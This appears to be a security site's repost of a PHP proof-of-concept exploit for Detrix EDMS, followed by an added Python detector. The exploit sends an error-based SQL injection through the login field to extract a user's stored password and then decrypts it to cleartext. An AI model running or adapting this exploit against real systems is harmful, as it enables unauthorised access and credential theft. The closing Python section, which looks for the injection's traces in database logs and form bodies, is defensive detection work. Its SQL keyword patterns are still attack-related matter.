
Detrix EDMS – SQL Injection

<?php
# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit

# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
# Version: any
# Tested on: Detrix

$URL = ""; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID

$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
	"http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
	"[email protected], 2019.\n\n";

// SQLi request
$sql_req =
	"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
	"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
	"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
	"AS NUMERIC) AND 'a'='a";

$data = array('password' => 'pass',
	'login' => $sql_req);

$options = array(
	'http' => array(
		'header' => "Content-type: application/x-www-form-urlencoded\r\n",
		'method' => 'POST',
		'content' => http_build_query($data)
	)
);

// Key from %detrix%/system/utils/MSF_string.php
// (the value is not reproduced on this page; copy it from that file)
$sSuperDuperSecretKey = "";

echo $banner;

$result = "";
try {
	$context  = stream_context_create($options);
	echo "Send SQLi to $URL...\n";
	$result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
	echo 'Error: ',  $e->getMessage(), "\n";
}

if ($result != "") {
	if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {
		// Decrypt pass. The decrypt call itself was missing from this copy;
		// openssl_decrypt() with the listed cipher and key is assumed here.
		$clear_pass = trim(openssl_decrypt(
			$encrypted_pass[1], "BF-ECB", $sSuperDuperSecretKey
		));
		echo "Pass for User id $user_id: $clear_pass \n";
	} else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n";
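As an added defender-side example (mine, not part of the original advisory or of the Detrix project), the following Python flags the two traces this technique leaves behind: PostgreSQL's numeric-cast error echoing the marker-wrapped value, and a login field carrying SQL fragments. The log line formats and the encrypted value are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Two observable traces of the error-based technique used in this PoC:
# (1) PostgreSQL rejects the marker-wrapped string it was asked to CAST AS
#     NUMERIC and echoes that string back in its error message;
# (2) the POST body carries SQL fragments inside the 'login' field.
PG_NUMERIC_CAST_ERROR = re.compile(
    r'invalid input syntax for (?:type )?numeric: "(?P<payload>[^"]*)"')
MARKER_WRAPPED = re.compile(r"^[A-Za-z]+__(?P<leak>.+)__[A-Za-z]+$")
SQL_FRAGMENT = re.compile(
    r"(?i)(\bCAST\s*\(|\bSELECT\b|\bCOALESCE\b|\bOFFSET\b|\|\||::text)")


def leaked_value(pg_log_line):
    """Return the value exfiltrated through a numeric-cast error, else None."""
    err = PG_NUMERIC_CAST_ERROR.search(pg_log_line)
    if not err:
        return None
    wrapped = MARKER_WRAPPED.match(err.group("payload"))
    return wrapped.group("leak") if wrapped else None


def injected_fields(form_body):
    """Return names of form fields whose decoded value contains SQL fragments."""
    hits = []
    for pair in form_body.split("&"):
        name, _, value = pair.partition("=")
        if SQL_FRAGMENT.search(unquote_plus(value)):
            hits.append(unquote_plus(name))
    return hits


# Constructed sample lines (not real captures); the leaked value is a dummy.
PG_LOG = [
    '2019-11-11 10:00:01 UTC ERROR:  invalid input syntax for type numeric: "a__ZHVtbXk=__a"',
    '2019-11-11 10:00:02 UTC STATEMENT:  SELECT ... WHERE login = \'login\' AND 99=CAST(',
    '2019-11-11 10:00:05 UTC ERROR:  invalid input syntax for type numeric: "12,5"',
]
LOGIN_BODY = ("password=pass&login=login%27+AND+99%3DCAST%28%27a__%27%7C%7C"
              "%28SELECT+COALESCE%28password%2C+CHR%2832%29%29+...%29")


def scan_all():
    """Collect alerts from both sources; returns a list of (source, detail)."""
    alerts = [("postgres", v) for v in map(leaked_value, PG_LOG) if v]
    alerts += [("login-form", f) for f in injected_fields(LOGIN_BODY)]
    return alerts


if __name__ == "__main__":
    for source, detail in scan_all():
        print(f"ALERT [{source}]: {detail}")
```

A hit on the PostgreSQL side is the stronger signal, since it proves the injected CAST actually reached the database rather than being blocked upstream.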

November 11, 2019

Copyright © Linux Force Security - Since 2011.